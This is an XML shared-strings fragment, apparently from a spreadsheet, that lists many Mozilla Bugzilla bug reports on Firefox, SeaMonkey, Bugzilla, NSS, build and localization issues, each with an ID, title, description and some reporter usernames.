  <si>
    <t>I'm not really sure if this should be a new bug or not but it seems to me that the current algorithm being used to recommend corrections is missing some reasonable (and sometimes obvious) replacement options.
If I type in tish this isn't recommended
If I type in wurks works isn't recommended
If I type in suodn sound isn't recommended
I'm sure I can find more similar situations. For the record all of the above three are recommended (or autocorrected) properly by MS Word/Outlook.
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060427 Firefox/3.0a1</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-498631</t>
  </si>
  <si>
    <t>[l10n] In 3.5 firstrun v.1/v.2 pages for kn locale title text overlaps Firefox logo and images</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 fr rv:1.9.1b99) Gecko/20090605 Firefox/3.5b99
Build Identifier: 
In 3.5 firstrun v.1/v.2 pages for kn locale the title Welcome to Ff 3.5 as well as the text that follows (Thanks for installing the fastest safest and smartest version of Firefox yet) overlaps Firefox logo and the bird images.
This makes text and logos unclear as well as a part of the white text completely invisible after the 3.5
Reproducible: Always</t>
  </si>
  <si>
    <t>DEVELOPER_SERVICES-466149</t>
  </si>
  <si>
    <t>Mercurial: hg.mozilla.org</t>
  </si>
  <si>
    <t>DEVELOPER_SERVICES</t>
  </si>
  <si>
    <t>pushlog hook should check that database schema actually exists</t>
  </si>
  <si>
    <t>Currently the pushlog hook just checks for the existence of the pushlog file. If the file exists but is an empty file (which can happen if the pushlog-feed has tried and failed to open it) things will fall over. The hook should check to see that the expected schema exists as well.</t>
  </si>
  <si>
    <t>SEAMONKEY-262893</t>
  </si>
  <si>
    <t>In  Warning: redeclaration of var i and others</t>
  </si>
  <si>
    <t>[Mozilla/5.0 (Windows U Win98 en-US rv:1.8a4) Gecko/20040927] (release) (W98SE)
{{
Warning: redeclaration of var i
Source File: chrome://messenger/content/searchBar.js
Line: 386 Column: 11
Source Code:
  for (var i = 0 i &lt; termsArray.Count() i++)
}}</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-449837</t>
  </si>
  <si>
    <t>[eo] Migrate CVS over to hg</t>
  </si>
  <si>
    <t>We'll need a good point to migrate the content in cvs for eo over to an hg repository beneath http://hg.mozilla.org/l10n-central/
Please follow up to this bug when you think you're ready setting the status whiteboard to a timestamp you'd consider good.
Please don't land content in hg yourself before the initial migration is done we want to make sure that the initial content in hg maps a cvs tag so that we can fix up hg annotate on the website to refer to cvs blame at one point.</t>
  </si>
  <si>
    <t>CORE-368048</t>
  </si>
  <si>
    <t>Device Manager list updates incorrectly after security module is unloaded</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en) AppleWebKit/418.9.1 (KHTML like Gecko) Safari/419.3
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
When a security module is unloaded (frex a PKCS#11 module) the list of security devices is updated.  However the *first* entry in the list (the Built-in module) is deleted.  When the UI is closed and re-opened the correct list is shown.
Reproducible: Always
Steps to Reproduce:
1. Load a security module.
2. Unload the new module.
3. Observe the list.
4. Close the Device Manager window.
5. Open the Device Manager window.
6. Observe the list.
Actual Results:  
The wrong module is initially removed from the list but the correct list is shown when the UI is re-opened.
Expected Results:  
The list should update correctly the first time.
I was unsure if I should log this against Firefox or this component.</t>
  </si>
  <si>
    <t>tmiller</t>
  </si>
  <si>
    <t>FIREFOX-406408</t>
  </si>
  <si>
    <t>Sort by Name in the context menu of Bookmarks Toolbar should not be disabled</t>
  </si>
  <si>
    <t>In a certain condition Sort by Name in the context menu of
Bookmarks Toolbar is disabled.
Steps to reproduce:
1. Right click on a folder of Bookmarks Toolbar.
   Sort by Name in the context menu is enabled.
2. Right click on blank area of Bookmarks Toolbar.
   Sort by Name in the context menu is still enabled.
3. Right click on blank area of Bookmarks Toolbar again.
Actual result:
   Sort by Name in the context menu is disabled.
Expected result:
   Sort by Name in the context menu is enabled.
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9b2pre) Gecko/2007120211 Minefield/3.0b2pre</t>
  </si>
  <si>
    <t>CORE-381031</t>
  </si>
  <si>
    <t xml:space="preserve">make JS1.8 the default for </t>
  </si>
  <si>
    <t>From bug 380236 comment 7:
Mike Shaver   2007-05-10 05:32:08 PDT
Related (I think): can/should we make JS1.8 the default for XUL-loaded JS in
Gecko 1.9?  We didn't in 1.8.1 for good compatibility reasons but it makes for
a lot of poking around by extension and app authors to get the right versioning
parameters and I think we'd do better by them in 1.9 to make the switch.</t>
  </si>
  <si>
    <t>CORE-474704</t>
  </si>
  <si>
    <t>[@font-face] Leak nsCrossSiteListenerProxy and nsFontFaceLoader (loading 472237-1.html over file:)</t>
  </si>
  <si>
    <t>Created attachment 358073
trace-refcnt leak log
Steps to reproduce:
1. Run Firefox with trace-refcnt enabled.
2. Load layout/style/crashtests/472237-1.html using a file: URL.  (Note that in Tinderbox tests it is loaded using an http: URL.)
3. Quit Firefox.
Result: trace-refcnt reports leaked nsCrossSiteListenerProxy nsFontFaceLoader etc.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-85296</t>
  </si>
  <si>
    <t>Reply and Reply-all on messages sent From: myself should use the original To: field</t>
  </si>
  <si>
    <t>When I press Reply on a message that I've sent earlier the right thing to do is
to start composing the message using the same TO field that the original
message had _not_ To: myself. Same with Reply-all it should use the original
To and Cc fields in this case.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-387856</t>
  </si>
  <si>
    <t>add naist to mirrors page</t>
  </si>
  <si>
    <t>Please add NAIST to the mirrors page.
http://www.mozilla.org/mirrors.html
http://mozilla-mirror.naist.jp/</t>
  </si>
  <si>
    <t>gen</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-314955</t>
  </si>
  <si>
    <t>docmasonmusic.com - lyrics page sent as text/plain instead of text/html</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.12) Gecko/20050915 Firefox/1.0.7
when I click on  lyrics on the home page I get a html file.  The actual lyrics choose page is almost identical as the the listen page.  I have reloaded onto my server and everything works correctly on Safari and Internet Explorer.  I also notice that clicking anywhere on the home page will display a cloud picture that is in my resource file.  Help please.  doc
Reproducible: Always
Steps to Reproduce:
1.Click on Lyrics
2.
3.
Actual Results:  
Display is html file of page.
Expected Results:  
Should come up with three jpgs.  
Only Lets Go Get Cloned is currently linked.</t>
  </si>
  <si>
    <t>dnrmas</t>
  </si>
  <si>
    <t>BUGZILLA-237508</t>
  </si>
  <si>
    <t>checksetup.pl should use $^X when telling admin to install modules</t>
  </si>
  <si>
    <t>In .webtools Dave said:
&gt; The output from checksetup.pl when it gives instructions should probably
&gt; use $^X so no matter what perl they're using it tells them to use that same
&gt; one to install the modules.
Sounds like a good plan to me (this helps to mitigate the double-Perl-version
problem.)
Gerv</t>
  </si>
  <si>
    <t>DEVELOPER_SERVICES-528360</t>
  </si>
  <si>
    <t>Set up a git server</t>
  </si>
  <si>
    <t>We talked about this in the meeting today with IT and it didn't sound like it would be much work.  The AMO team is interested in trying out git for Zamboni (amo:v4).
jbalogh recommends using http://github.com/res0nat0r/gitosis for permissions and management but that's up to y'all.</t>
  </si>
  <si>
    <t>bkero</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-468488</t>
  </si>
  <si>
    <t>Thunderbird 3.0b1 win32 l10n MARs are busted</t>
  </si>
  <si>
    <t>It looks like you guys are hitting the same problem that we did Firefox 3.1b1 having to do with recent locales/Makefile.in changes. Axel did those fixes make it into comm-central?</t>
  </si>
  <si>
    <t>BUGZILLA-126883</t>
  </si>
  <si>
    <t>bugzilla.dtd isn't quite correct</t>
  </si>
  <si>
    <t>As pointed out on npm.webtools the dtd has a couple of optional elements
(exporter and urlbase) which shouldn't be there.
The stuff exported from landfill fails validation however because it is missing
op_sys. This is because the enum value is invalid. Not sure how that happened
and it occurs on bmo as well. However the last bug # affected by this on bmo is
bug 56209 so whatever the corruption this was has presumably been fixed.
On the newsgroup I said that we should still output empty values because of
this. I think I've changed my mind - bugzilla is not guarenteed to give correct
information if sanity checks fail (Of course they should never be allowed to
fail but theres not much option with mysql). I've therefore added a sanity
check for this so that we do fail the checks.
Anyway an op_sys of '' isn't likely to be valid on the other end.</t>
  </si>
  <si>
    <t>CORE-474801</t>
  </si>
  <si>
    <t>Checking for MaybeGC conditions when allocating GC things in JS shell</t>
  </si>
  <si>
    <t>This is part 1 of the original bug 453432. It adds MaybeGC conditions check for allocation of GC thins but it does not remove the MaybeGC functionality for DOM objects.</t>
  </si>
  <si>
    <t>andrei</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-271504</t>
  </si>
  <si>
    <t>GFX: Mac</t>
  </si>
  <si>
    <t>--with-macos-sdk=/Developer/SDKs/MacOSX10.2.8.sdk breaks w/ apple gcc</t>
  </si>
  <si>
    <t>configure:15163: checking for correct temporary object destruction order
configure:15188: c++ -o conftest -I/Developer/SDKs/MacOSX10.2.8.sdk/usr/include
 -fpascal-strings -no-cpp-precomp -fno-common -I/Dev
eloper/SDKs/MacOSX10.2.8.sdk/Developer/Headers/FlatCarbon -pipe   conftest.C
-L/Developer/SDKs/MacOSX10.2.8.sdk/usr/lib/gcc/darwin/
Apple Computer Inc. GCC version 1256 based on 3.1
-L/Developer/SDKs/MacOSX10.2.8.sdk/usr/lib  1&gt;&amp;5
c++: Computer: No such file or directory
c++: Inc.: No such file or directory
c++: GCC: No such file or directory
c++: version: No such file or directory
c++: 1256: No such file or directory
c++: based: No such file or directory
c++: on: No such file or directory
c++: 3.1: No such file or directory
configure: failed program was:
#line 15168 configure</t>
  </si>
  <si>
    <t>BUGZILLA-341539</t>
  </si>
  <si>
    <t>Component list not filtered when a product selected on Request Queue or Edit Flag Types</t>
  </si>
  <si>
    <t>When a product is selected but component is left and Any/All and Filter is pressed the resulting new form includes once again every component even though a product is selected. This happens on both Request Queue screen as well as on the Edit Flag Types screen (which recently acquired this functionality in bug 319067). Correct action is to limit components once again to those found in the selected product. User can then select a component that doesn't belong to the product and gets a nice error message about non-existing component.
Seems to be a recent regression as bmo seems to not be affected.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-481467</t>
  </si>
  <si>
    <t>Remove restricted visibility from bug #476766</t>
  </si>
  <si>
    <t>Please remove the restricted visibility from bug #476766.
The submitter of the bug has not been able to do this as per comment #7 in that bug: I can't un-check the box for Confidential Mozilla Project Bug  so what
should I do?
Thanks
Kathleen</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-395685</t>
  </si>
  <si>
    <t>[sk] review new rss news feed for FX3</t>
  </si>
  <si>
    <t>FX2 is now using BCC as rss news feed it does not provide localized content for users in Slovakia. We want to change it to Sme.sk feed. Sme.sk as one of the best and most reliable news server in Slovakia just list CNN or BBC in US and UK.
They have prepared special rss feed only for Firefox users (link below). We have their permission if needed we can send it to you.
If approved please redirect http://sk.fxfeeds.mozilla.com/sk/firefox/headlines.xml to http://rss.sme.sk/rss/rss.asp?sek=smeonline&amp;id=frontpage</t>
  </si>
  <si>
    <t>NSS-317856</t>
  </si>
  <si>
    <t>uninitialized variables in strsclnt.c</t>
  </si>
  <si>
    <t>strsclnt.c: In function 'launch_thread':
strsclnt.c:500: warning: 'i' is used uninitialized in this function
strsclnt.c: In function 'do_connects':
strsclnt.c:846: warning: 'now' is used uninitialized in this function
The first one is just used for a printf and not critical. I'm not sure for the second:
PRTime now
PR_Lock(threadLock)
lastConnectSuccess = PR_MAX(now lastConnectSuccess)
This seems broken to me at first glance.</t>
  </si>
  <si>
    <t>CORE-519905</t>
  </si>
  <si>
    <t>Avoid some more wrapper cache QIs in classinfo</t>
  </si>
  <si>
    <t>See bug 519608 comment 3.</t>
  </si>
  <si>
    <t>CALENDAR-268990</t>
  </si>
  <si>
    <t>Can I use Calendar with nightly builds of Mozilla Suite?</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.8a5) Gecko/20041025
Build Identifier: Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.8a5) Gecko/20041025
http://www.mozilla.org/projects/calendar/download.html#download_appsuite
seems to indicate as of 11/10/04 that there is no release of Calendar
compatible with Mozilla Suite nightlies.  Is this correct?  
I would like to be able to use Calendar and continue to test nightly builds.  If
this is safe can someone post which version to use and any special
installation procedures?
Reproducible: Didn't try
Steps to Reproduce:
Actual Results:  
I'm afraid to try it.</t>
  </si>
  <si>
    <t>bugzilla2</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-299997</t>
  </si>
  <si>
    <t>Build Firefox --with-libxul-sdk=/path</t>
  </si>
  <si>
    <t>Very early in 1.9 I want to add a build option that builds Firefox (and any
other xulapps/extensions that wants to come along for the ride) on top of
xulrunner in a separate objdir. They would be built with --with-libxul-sdk=/path
client.mk would be taught to build xulrunner+firefox all in one pass
This will not be the default build configuration until some point in the future
when the installer code is up and running and we can actually deliver usable
nightly builds with an installer in this configuration.</t>
  </si>
  <si>
    <t>CORE-115162</t>
  </si>
  <si>
    <t>Shrink layout data structures</t>
  </si>
  <si>
    <t>Patches to shrink some layout data stucturs coming..</t>
  </si>
  <si>
    <t>CORE-265542</t>
  </si>
  <si>
    <t>Many invalid selectors are not causing the rule to be ignored</t>
  </si>
  <si>
    <t>Many invalid selectors are not causing the rule to be ignored.
Testcases and patch coming up...</t>
  </si>
  <si>
    <t>MOZILLA.ORG-297441</t>
  </si>
  <si>
    <t>No mac SeaMonkey builds since June 7</t>
  </si>
  <si>
    <t>There are no seamonkey mac builds on the ftp site since June 7. Looks like
barcelona have died...</t>
  </si>
  <si>
    <t>CORE-355477</t>
  </si>
  <si>
    <t>map mouse buttons 8-9 to back/forward</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.8.0.7) Gecko/20061004 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.8.0.7) Gecko/20061004 Firefox/1.5.0.7
I'm attaching a simple patch that maps X mouse buttons 8-9 to the back/forward commands. The consensus amongst GTK+ and Qt seems to be that buttons 6-7 are for horizontal scrolling. Many new mouses have both 4 way scroll buttons and history control buttons so we have to map them to different numbers. I'm using the appCommand infrastructure as used on windows.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-301631</t>
  </si>
  <si>
    <t>Invalid PostScript comment header generated</t>
  </si>
  <si>
    <t>%%BoundingBox takes only integer arguments per the PostScript DSC spec:
http://partners.adobe.com/public/developer/en/ps/5001.DSC_Spec.pdf
(see section 5.1 page 39)
There was a DSC header Comment Extension specification put in place
http://partners.adobe.com/public/developer/en/ps/5644.Comment_Ext.pdf
which allows a new comment header %%HiResBoundingBox takes floating point
numbers however it recommends using both %%HiResBoundingBox and %%BoundingBox
as older viewers may not support %%HiResBoundingBox
Yes there are some viewers which cannot view the output postscript.  See
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=163684</t>
  </si>
  <si>
    <t>CORE-461594</t>
  </si>
  <si>
    <t>Interfaces changed without iid updates</t>
  </si>
  <si>
    <t>In my digging and parsing of teh apis I have come across some interfaces that changed between 1.9.0.0 but have not had iid updates. I've filtered out those that are only changes to constants as I understand they are not an issue. Copying those that made the changes unless there is a reason not to I'll just file a patch to update the iid's for all. All of these were changed between 1.9.0.0 and 1.9.1b1. There have been no changes without iid bumps since.
http://hg.mozilla.org/mozilla-central/diff/553480dceb26/dom/public/idl/html/nsIDOMHTMLCanvasElement.idl
http://hg.mozilla.org/mozilla-central/diff/1ebacbd09ad9/dom/public/idl/base/nsIDOMNavigator.idl
http://hg.mozilla.org/mozilla-central/diff/3e2c3a4d3d40/dom/public/idl/traversal/nsIDOMNodeIterator.idl
http://hg.mozilla.org/mozilla-central/diff/85a89d00d9b3/content/base/public/nsIXMLHttpRequest.idl (nsIJSXMLHttpRequest so maybe not a problem?)
http://hg.mozilla.org/mozilla-central/diff/c823327ec9e0/xpcom/threads/nsIThreadPool.idl
http://hg.mozilla.org/mozilla-central/diff/378495e669f9/widget/src/cocoa/nsPIWidgetCocoa.idl</t>
  </si>
  <si>
    <t>CLOUD_SERVICES_GRAVEYARD-612357</t>
  </si>
  <si>
    <t>Firefox Home</t>
  </si>
  <si>
    <t>CLOUD_SERVICES_GRAVEYARD</t>
  </si>
  <si>
    <t>Move Custom Server setting to the Login Screen</t>
  </si>
  <si>
    <t>Move Custom Server setting to the Login Screen. This means it will be removed from the settings.</t>
  </si>
  <si>
    <t>sarentz</t>
  </si>
  <si>
    <t>TOOLKIT-490867</t>
  </si>
  <si>
    <t>Variant fixes: coerce null to empty string GetIsNull should check correct type variant base type should be void</t>
  </si>
  <si>
    <t>The sync API returns the empty string when a string getter is called on a null value:
http://mxr.mozilla.org/mozilla-central/source/storage/src/mozStorageStatement.cpp#744
http://mxr.mozilla.org/mozilla-central/source/storage/src/mozStorageStatement.cpp#767
Places code as it exists right now depends on this behavior.
However the async API returns NS_ERROR_CANNOT_CONVERT_DATA when the same thing is attempted.  At least the two APIs should be consistent.  After talking with Shawn I'll attempt to make the async consistent with the sync so that nulls are returned as the empty string.</t>
  </si>
  <si>
    <t>TESTING-379766</t>
  </si>
  <si>
    <t>mochitest result page could include bug links for bug tests</t>
  </si>
  <si>
    <t>Created attachment 263766
a patch
I am looking at the mochitest output. I see:
/tests/toolkit/components/passwordmgr/test/test_bug_227640.html
If I want to go see the bug is there any reason why I have to construct the URL? After all I am looking at a web page. It could have a link to the bug.
See the patch.</t>
  </si>
  <si>
    <t>BUGZILLA-99203</t>
  </si>
  <si>
    <t>alias for a bug</t>
  </si>
  <si>
    <t>Need a way to address a bug using a string moniker. More specifically we'd like
to be able to add an alias to the |Depends on| and the |Blocks| list.</t>
  </si>
  <si>
    <t>gagan</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-385915</t>
  </si>
  <si>
    <t>need baseline data for talos</t>
  </si>
  <si>
    <t>need 1 to 2 months of seed data for talos running under buildbot. Both branch and trunk required.</t>
  </si>
  <si>
    <t>SEAMONKEY-403990</t>
  </si>
  <si>
    <t>Add sk locale to SeaMonkey all-locales</t>
  </si>
  <si>
    <t>Please add sk locale to SeaMonkey all-locales. Compare-locales script says we should turn green immediately.</t>
  </si>
  <si>
    <t>CORE-369227</t>
  </si>
  <si>
    <t>ASSERTION: Backuping up twice this should never be necessary with floats and vertical scrollbar</t>
  </si>
  <si>
    <t>Created attachment 253904
testcase
Loading the testcase triggers:
###!!! ASSERTION: Backuping up twice this should never be necessary: '!forceBreakInContent' file /Users/jruderman/trunk/mozilla/layout/generic/nsBlockFrame.cpp line 3074
This assertion was added in bug 343445.
http://quotes.burntelectrons.org/1892</t>
  </si>
  <si>
    <t>SEAMONKEY-302215</t>
  </si>
  <si>
    <t>red XUL errors: menu_HelpPopup_reportertoolmenu and menu_inspector</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b4) Gecko/20050726 SeaMonkey/1.0a
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b4) Gecko/20050726 SeaMonkey/1.0a
After building a current SeaMonkey nightly with --extensions=all I got the
following XUL error strings at the lower end of the browser window (presented
here is the equivalent output of the JavaScript console):
Error: undefined entity
Source File: chrome://reporter/content/reporterOverlay.xul
Line: 50 Column: 5
Source Code:
    &lt;menuitem id=menu_HelpPopup_reportertoolmenu 
Error: undefined entity
Source File: chrome://inspector/content/tasksOverlay.xul
Line: 20 Column: 5
Source Code:
    &lt;menuitem id=menu_inspector label= 
This appeared only recently (i.e. within the last one or two weeks) and can be
reproduced by me with custom Linux and Windows builds.
Reproducible: Always
Steps to Reproduce:
1. Build SeaMonkey from CVS with --enable-extensions=all
2. Open a browser window using a fresh profile if you like
Actual Results:  
XUL errors shown in red letters within chrome
Expected Results:  
No errors should be displayed</t>
  </si>
  <si>
    <t>SEAMONKEY-153525</t>
  </si>
  <si>
    <t>Allow mach-o build to build on gcc3</t>
  </si>
  <si>
    <t>I've been working on getting the mach-o build to build with the gcc3
in Apple's April 2002 Dev Tools beta.  Anyway to describe the changes
I have so far in more detail:
-----
The new compiler/linker combination doesn't like linking C++ files
using gcc3 rather than g++3.  This led to the changes in
config/Makefile.in to get asdecode to be linked with $(CXX) rather
than $(CC).  However this is somewhat of a hack (it forces the
same thing to happen to nsinstall which does no harm and it's
Darwin-only) but asdecode should really be in its own directory.
-----
This patch uses ifdefs etc. to port the ppc-rhapsody xptcall code
to gcc3 so that it still works on gcc 2.95.  Parts of the patch
are based on Glenn Nakamura's patch in bug 86446.
TestXPTCInvoke works fine in both my 2.95 and 3.1 builds.
I can easily rewrite this part after bryner lands his patch to the xptcall
code that he needs for prebinding.
-----
The old gcc passed -install_name through to libtool (for -dynamiclib)
but filtered it out for ld.  The new one doesn't filter for ld
(which is used to link -bundle libraries) so we can't pass
-install_name when using -bundle.  However beard thinks this is probably
OK and my 2.95 build still works fine.  (I'm using it to write this
bug report.)
-----
The compiler has one major bug that I need to report.  I've worked
around it a bit but it finally got to one point where the workaround
stopped working.  Some of the workarounds are probably good code
changes that we'd want to check in.  The bug is that the compiler
chokes on non-const static variables in inline static member functions.
I fixed a large number of them by converting hand-crafted GetIID
functions that didn't use |const| to use NS_DEFINE_STATIC_IID_ACCESSOR.
These seem like changes that we may as well check in.  However some of
the changes shouldn't be checked in.
I need to file a compiler bug but ADC login that I created yesterday
didn't seem to work at http//bugreporter.apple.com/ .
Examples of the error messages before these changes are:
/Users/dbaron/builds/trunk/mozilla/xpcom/ds/nsIArena.h: In function `static 
   const nsIID&amp; nsIArena::GetIID()':
/Users/dbaron/builds/trunk/mozilla/xpcom/ds/nsIArena.h:61: nsIID iid causes a 
   section type conflict
/Users/dbaron/builds/trunk/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp:47
4: WrappedJSIdentity*singleton
    causes a section type conflict
The don't-check-this-in changes are particularly in the files:
  js/src/xpconnect/src/xpcwrappedjsclass.cpp
  perhaps the caps changes although I prefer my way...
-----
I'd probably like to get parts of the changes I have so far checked in.
I'll attach a patch with everything I've done and then perhaps split it
into things that I'd like to get checked in sometime later.</t>
  </si>
  <si>
    <t>BUGZILLA-289455</t>
  </si>
  <si>
    <t>products.classification_id has a different definition in an upgraded database than in a brand-new database</t>
  </si>
  <si>
    <t>The bugzilla-tip install on landfill has a classification_id with this
definition in the products table:
classification_id smallint(6) default '1'
Whereas the Schema creates classification_id with this definition:
classification_id smallint(6) NOT NULL default '1'
This only happens when we create the raw database not when we add
classifications to an old install for some reason.</t>
  </si>
  <si>
    <t>FIREFOX-347415</t>
  </si>
  <si>
    <t>Accesskey for Proportional is not displayed in the advanced preference font panel</t>
  </si>
  <si>
    <t>When going in Preferences &gt; Content &gt; Advanced button (in the Fonts &amp; Colors groupbox) the accesskey for 'Proportional' isn't displayed i.e the letter P is not underlined. I watched in the fonts.xul file and though the syntax is correct I noticed a difference between the Suite code (in SeaMonkey the letter P is underlined) and Firefox code :
this line in firefox is coded this way :
and that way in the Suite :
Do you think this could be the reason?
I'm waiting for your comments before attaching a patch and filing the same bug for Thunderbird.</t>
  </si>
  <si>
    <t>cedric.corazza</t>
  </si>
  <si>
    <t>SEAMONKEY-195990</t>
  </si>
  <si>
    <t>Save image as ... takes a long long time</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030210
Build Identifier: ozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030210
when save image it takes a *ridiculous* long time (compare to IE or any other
browser) to see the progress dialog and it also take a while to wait it to
finish - it doesn't matter if you disable progress dialog or not.
btw - I submitted this bug long time ago against a much older mozilla version
(1.0) before. The problem persist today (1.3 Beta). 
Reproducible: Always
Steps to Reproduce:
1. Just view any image
2. Right click on it select Save image as ...</t>
  </si>
  <si>
    <t>fwang2</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-436369</t>
  </si>
  <si>
    <t>image three talos minis for fast cycle moz2 machines</t>
  </si>
  <si>
    <t>Need three minis imaged for fast cycle moz2 machines.  Should be:
- 1 ubuntu linux
- 1 mac tiger 
- 1 winxp
This is currently blocked on new machines being delivered and racked.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-374452</t>
  </si>
  <si>
    <t>Access to the Security Wiki for Igor Bukanov</t>
  </si>
  <si>
    <t>From email:
&gt; ==Security Wiki Status==
&gt;
&gt; If you were on the security-group list you have been added to the access list for https://intranet.mozilla.org/Security
&gt;
&gt; If you don't have an LDAP account you should have gotten mail on how to get one.  Let me know if you still need  help getting access to the security wiki. Interesting bug queries and other info will be moving there.
&gt;
&gt;
&gt; chris h.
Since I have not get yet any email about how to get LDAP account I hope that this is just a temporary glitch.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-167188</t>
  </si>
  <si>
    <t>bookmark group (tab set) behavior inconsistent</t>
  </si>
  <si>
    <t>tested using 2002.09.06.05. the replacement behavior of bookmark groups is
consistent test cases below.
pre-existing condition: create a bookmark group (bmg tab set) with two tabs
and save it to the toolbar (for easy access). for example i had these two urls
in a bmg:
http://bugzilla.mozilla.org/
http://tinderbox.mozilla.org/showbuilds.cgi?tree=Chimera
case a
------
if you have a window that has 1 or 2 tabs in it clicking the bmg link in the
toolbar will *replace* the content with the bmg.
case b
------
if you have a window that has 3 or more tabs in it clicking the bmg link will
only replace the content in the *first two* tabs.
(b) feel inconsistent: if you're going to always replace tabs when accessing a
bookmark group then it should replace *all* of the tabs (no matter the number)
with the bookmark group.
another alternative is to follow the mozilla branch (netscape 7.0rtm) model to
make bmg always *additive* never replacing the present tabs in a window.
marlon / lori what were the overall findings in the netscape usability study
regarding how bookmark groups should behave?</t>
  </si>
  <si>
    <t>CORE-530296</t>
  </si>
  <si>
    <t>Replace PR_MIN/PR_MAX with NS_MIN/NS_MAX in /editor</t>
  </si>
  <si>
    <t>NSS-320047</t>
  </si>
  <si>
    <t>mp_to_unsigned_octets copies nothing to the buffer if the mp_int is zero.</t>
  </si>
  <si>
    <t>The mp_to_unsigned_octets function has this prototype:
mp_err mp_to_unsigned_octets(const mp_int *mp unsigned char *str mp_size maxlen)
If the mp_int argument 'mp' has the value 0 the function
does not copy anything to the buffer 'str' and returns 0.
This is wrong.  The function should copy one zero byte to
the buffer 'str' and return 1.
I found this bug by code inspection while comparing the
mp_unsigned_octet_size function with mp_to_unsigned_octets.
mp_unsigned_octet_size returns 1 if the mp_int is zero.
I confirmed this bug with the following code snippet:
    mp_err err
    mp_int zero
    int zero_len
    unsigned char zeroBytes[16]
    MP_DIGITS(
    CHECK_MPI_OK( mp_init(
    mp_zero(
    zero_len = mp_unsigned_octet_size(
    printf(zero_len = %d\n zero_len)
    memset(zeroBytes 0xaf sizeof zeroBytes)
    CHECK_MPI_OK( mp_to_unsigned_octets(
    {
        int i
        for (i = 0 i &lt; sizeof zeroBytes i++) {
            printf(%02X (unsigned)zeroBytes[i])
        }
        printf(\n)
    }
 cleanup:
+    mp_clear(
The output is:
zero_len = 1
AFAFAFAFAFAFAFAFAFAFAFAFAFAFAFAF
which shows mp_to_unsigned_octets didn't write anything
to the buffer.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-514954</t>
  </si>
  <si>
    <t>add AC_DEFINE for official-branding</t>
  </si>
  <si>
    <t>So that apps can easily make build-time decisions based on branding (see dependent bugs).</t>
  </si>
  <si>
    <t>FIREFOX-310393</t>
  </si>
  <si>
    <t>Hitting Enter in the searchbar w/o input shouldn't add an empty entry to its autocomplete</t>
  </si>
  <si>
    <t>Hitting Enter in the searchbar w/o input shouldn't add an empty entry to its
autocomplete.
STR:
 1. Focus the search bar.
 2. Make sure it's empty.
 3. Hit Enter
-&gt; empty string is added to searchbar's autocomplete.
FYI at this point we're opening the search engine site instead of doing a query.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-492397</t>
  </si>
  <si>
    <t>Update QMO stage/production servers to pull from correct locations in SVN</t>
  </si>
  <si>
    <t>The QMO repository is currently set up such that the production server is at branches/qmo2.
This needs to be moved to tags/production (as we usually have it)</t>
  </si>
  <si>
    <t>paul+moz</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-143288</t>
  </si>
  <si>
    <t>lgelectronics.co.uk - menu javascript does not support DOM browsers</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 en-US rv:1.0rc2) Gecko/20020508
BuildID:    2002050806
The javascript at the above address for the menu system only supports
document.layers or document.all preventing access at all to the links
contained in it.
Reproducible: Always
Steps to Reproduce:
1.Go to the URL
2.Try to use the product support menu
Actual Results:  No dropdown appears no click possible.
Expected Results:  Should work.
Not contacted yet as the required fields of the contact form ask for
too much info and did not want to fill in fake stuff in case it caused
them to ignore the report.</t>
  </si>
  <si>
    <t>david_emmerson</t>
  </si>
  <si>
    <t>CORE-481697</t>
  </si>
  <si>
    <t>TextRunWordCache::MakeTextRun: Mismatched free() / delete / delete []</t>
  </si>
  <si>
    <t>layout/base/tests/test_bug441782-2.html</t>
  </si>
  <si>
    <t>TESTOPIA-373226</t>
  </si>
  <si>
    <t>Bugs Detected - Display</t>
  </si>
  <si>
